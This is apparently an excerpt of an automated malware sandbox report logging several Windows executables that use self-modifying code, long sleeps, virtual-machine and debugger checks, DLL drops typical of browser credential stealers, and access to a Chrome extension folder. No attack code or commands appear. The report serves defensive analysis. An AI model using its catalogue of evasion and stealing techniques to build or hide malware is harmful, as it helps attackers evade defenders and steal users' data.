Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Special instruction interceptor: First address: BFFFCD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Special instruction interceptor: First address: DAF81C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Special instruction interceptor: First address: F5ED94 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Special instruction interceptor: First address: 3DAAD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Special instruction interceptor: First address: 1E480B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Special instruction interceptor: First address: 1EC9C4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Special instruction interceptor: First address: 280724 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Special instruction interceptor: First address: 663DAAD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Special instruction interceptor: First address: 67E480B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Special instruction interceptor: First address: 67EC9C4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Special instruction interceptor: First address: 6880724 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Special instruction interceptor: First address: 825C7F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Special instruction interceptor: First address: 825D56 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Special instruction interceptor: First address: 9BF9B7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Special instruction interceptor: First address: 8231E6 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Memory allocated: 56D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Memory allocated: 5950000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Memory allocated: 7950000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Memory allocated: 5240000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Memory allocated: 55B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Memory allocated: 75B0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Documents\CAFIJKFHIJ.exe

Code function: 9_2_05510C3B rdtsc

9_2_05510C3B

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 2370	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 2223	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 2095	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 755	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Window / User API: threadDelayed 9377
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Window / User API: threadDelayed 1782
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Window / User API: threadDelayed 805

Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\w7fGYZf24Ge7FfsRdF5EZfeASffsv\Bunifu_UI_v1.5.3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\w7fGYZf24Ge7FfsRdF5EZfeASffsv\Y-Cleaner.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\dll[1]	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe TID: 7328	Thread sleep time: -36018s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7332	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7400	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7320	Thread sleep time: -46023s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7324	Thread sleep time: -40020s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7304	Thread sleep time: -42021s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7668	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7668	Thread sleep time: -130065s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676	Thread sleep count: 64 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676	Thread sleep time: -128064s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7612	Thread sleep count: 277 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7612	Thread sleep time: -8310000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7648	Thread sleep count: 56 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7648	Thread sleep time: -112056s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7620	Thread sleep count: 2370 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7620	Thread sleep time: -4742370s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7644	Thread sleep count: 2223 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7644	Thread sleep time: -4448223s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7560	Thread sleep count: 2095 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7560	Thread sleep time: -4192095s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7656	Thread sleep count: 51 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7656	Thread sleep time: -102051s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7704	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7620	Thread sleep count: 755 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7620	Thread sleep time: -1510755s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7644	Thread sleep count: 178 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7644	Thread sleep time: -356178s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe TID: 1228	Thread sleep time: -84042s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe TID: 2208	Thread sleep time: -86043s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe TID: 6792	Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe TID: 2284	Thread sleep time: -76038s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe TID: 2756	Thread sleep time: -35000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe TID: 916	Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe TID: 2844	Thread sleep time: -80040s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe TID: 4048	Thread sleep time: -80040s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe TID: 6964	Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe TID: 4476	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe TID: 6764	Thread sleep count: 102 > 30
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe TID: 6764	Thread sleep time: -204102s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe TID: 6784	Thread sleep count: 116 > 30
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe TID: 6784	Thread sleep time: -232116s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe TID: 1848	Thread sleep count: 50 > 30
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe TID: 1848	Thread sleep count: 81 > 30
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe TID: 1848	Thread sleep count: 79 > 30
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe TID: 6836	Thread sleep count: 115 > 30
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe TID: 6836	Thread sleep time: -230115s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe TID: 6380	Thread sleep count: 1782 > 30
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe TID: 6380	Thread sleep time: -3565782s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe TID: 6392	Thread sleep count: 112 > 30
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe TID: 6392	Thread sleep time: -224112s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe TID: 6848	Thread sleep count: 113 > 30
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe TID: 6848	Thread sleep time: -226113s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe TID: 4504	Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe TID: 5960	Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe TID: 5184	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe TID: 6008	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe TID: 8068	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe TID: 8112	Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe TID: 8128	Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe TID: 3620	Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe TID: 7940	Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe TID: 7836	Thread sleep time: -48024s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe TID: 7952	Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe TID: 1120	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe TID: 7388	Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe TID: 500	Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe TID: 6008	Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe TID: 3476	Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe TID: 2008	Thread sleep time: -38019s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C59EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

0_2_6C59EBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WerFault.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2124691295.0000000000E55000.00000040.00000001.01000000.00000003.sdmp, CAFIJKFHIJ.exe, 00000009.00000000.2105331337.00000000004B2000.00000080.00000001.01000000.0000000B.sdmp, CAFIJKFHIJ.exe, 00000009.00000002.2157690583.00000000004B2000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000A.00000002.2188144954.00000000006F2000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 0000000A.00000000.2129724318.00000000006F2000.00000080.00000001.01000000.0000000D.sdmp, skotes.exe, 0000000B.00000002.2194187707.00000000006F2000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 0000000B.00000000.2140601980.00000000006F2000.00000080.00000001.01000000.0000000D.sdmp, skotes.exe, 0000000C.00000000.2296449357.00000000006F2000.00000080.00000001.01000000.0000000D.sdmp, d985563cac.exe, 00000010.00000002.3082176049.00000000067C3000.00000040.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000002.3061989094.0000000000B53000.00000040.00000001.01000000.00000011.sdmp, 25045de666.exe, 00000011.00000002.2740526454.0000000000F35000.00000040.00000001.01000000.00000012.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: firefox.exe, 00000021.00000002.3055190646.00000273991E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
Source: firefox.exe, 00000021.00000002.3055190646.00000273991E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW-
Source: firefox.exe, 00000022.00000002.3024430303.000001F80BE6A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW.
Source: firefox.exe, 00000022.00000002.3024430303.000001F80BE6A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: firefox.exe, 00000021.00000002.3055190646.0000027399190000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWPf
Source: 25045de666.exe, 00000011.00000002.2744434040.000000000179E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2124046353.0000000000615000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2124046353.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3043970362.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000002.3065632992.000000000126E000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000002.3065632992.00000000012CF000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2976247338.00000000012CF000.00000004.00000020.00020000.00000000.sdmp, 25045de666.exe, 00000011.00000002.2744434040.00000000017E4000.00000004.00000020.00020000.00000000.sdmp, 25045de666.exe, 00000011.00000002.2744434040.000000000180F000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000002.2940566596.00000000013FA000.00000004.00000020.00020000.00000000.sdmp, f1628a2a52.exe, 00000013.00000003.2774096530.00000000016DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: f1628a2a52.exe, 00000013.00000003.2852581117.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, f1628a2a52.exe, 00000013.00000003.2852002057.0000000001693000.00000004.00000020.00020000.00000000.sdmp, f1628a2a52.exe, 00000013.00000003.2852313418.000000000169C000.00000004.00000020.00020000.00000000.sdmp, f1628a2a52.exe, 00000013.00000003.2852383589.00000000016A1000.00000004.00000020.00020000.00000000.sdmp, f1628a2a52.exe, 00000013.00000003.2852926948.00000000016C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWg
Source: firefox.exe, 00000021.00000002.3065387180.00000273A32A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3045810542.000001F80C217000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: file.exe, 00000000.00000002.2124046353.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW~
Source: file.exe, 00000000.00000002.2124691295.0000000000E55000.00000040.00000001.01000000.00000003.sdmp, CAFIJKFHIJ.exe, 00000009.00000000.2105331337.00000000004B2000.00000080.00000001.01000000.0000000B.sdmp, CAFIJKFHIJ.exe, 00000009.00000002.2157690583.00000000004B2000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000A.00000002.2188144954.00000000006F2000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 0000000A.00000000.2129724318.00000000006F2000.00000080.00000001.01000000.0000000D.sdmp, skotes.exe, 0000000B.00000002.2194187707.00000000006F2000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 0000000B.00000000.2140601980.00000000006F2000.00000080.00000001.01000000.0000000D.sdmp, skotes.exe, 0000000C.00000000.2296449357.00000000006F2000.00000080.00000001.01000000.0000000D.sdmp, d985563cac.exe, 00000010.00000002.3082176049.00000000067C3000.00000040.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000002.3061989094.0000000000B53000.00000040.00000001.01000000.00000011.sdmp, 25045de666.exe, 00000011.00000002.2740526454.0000000000F35000.00000040.00000001.01000000.00000012.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: firefox.exe, 00000021.00000002.3055190646.00000273991AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWventWindowClass}
Source: d985563cac.exe, 00000012.00000002.2940566596.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: firefox.exe, 00000021.00000002.3055190646.00000273991E2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3046690560.000001F80C300000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\Documents\CAFIJKFHIJ.exe

Code function: 9_2_05510B37 Start: 05510B04 End: 05510B0B

9_2_05510B37

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Open window title or class name: regmonclass
